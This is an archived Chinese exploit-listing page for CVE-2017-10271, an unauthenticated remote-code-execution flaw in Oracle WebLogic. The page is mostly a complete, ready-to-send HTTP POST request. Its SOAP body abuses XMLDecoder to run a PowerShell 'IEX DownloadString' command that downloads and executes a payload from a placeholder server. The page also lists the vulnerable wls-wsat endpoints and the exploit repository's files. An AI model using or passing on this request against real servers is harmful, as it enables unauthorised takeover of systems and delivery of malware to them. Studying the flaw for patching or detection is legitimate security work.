关联漏洞
描述
WebLogic Exploit
介绍
CVE-2017-10271 identification and exploitation. Unauthenticated Weblogic RCE.
https://nvd.nist.gov/vuln/detail/CVE-2017-10271
https://www.oracle.com/technetwork/topics/security/cpuoct2017-3236626.html
```
POST /wls-wsat/CoordinatorPortType HTTP/1.1
Host: SOMEHOSTHERE
Content-Length: 1226
content-type: text/xml
Accept-Encoding: gzip, deflate, compress
Accept: */*
User-Agent: python-requests/2.2.1 CPython/2.7.6 Linux/3.19.0-25-generic
<soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/">
<soapenv:Header>
<work:WorkContext xmlns:work="http://bea.com/2004/06/soap/workarea/">
<java version="1.8.0_151" class="java.beans.XMLDecoder">
<void class="java.lang.ProcessBuilder">
<array class="java.lang.String" length="3">
<void index = "0">
<string>cmd</string>
</void>
<void index = "1">
<string>/c</string>
</void>
<void index = "2">
<string>powershell -exec bypass IEX (New-Object Net.WebClient).DownloadString('http://SOMESERVERHERE/GOTPAYLOAD.ps1')</string>
</void>
</array>
<void method="start"/>
</void>
</java>
</work:WorkContext>
</soapenv:Header>
<soapenv:Body/>
</soapenv:Envelope>
```
wls-wsat endpoint list
```
CoordinatorPortType
RegistrationPortTypeRPC
ParticipantPortType
RegistrationRequesterPortType
CoordinatorPortType11
RegistrationPortTypeRPC11
ParticipantPortType11
RegistrationRequesterPortType11
```
文件快照
[4.0K] /data/pocs/675f6a855af783f9fc12df38d4db60997642bf3c
├── [2.5K] exploit.py
├── [2.0K] payloads.py
├── [1.4K] README.md
├── [ 446] scanner.sh
└── [2.7K] weblogic.py
0 directories, 5 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。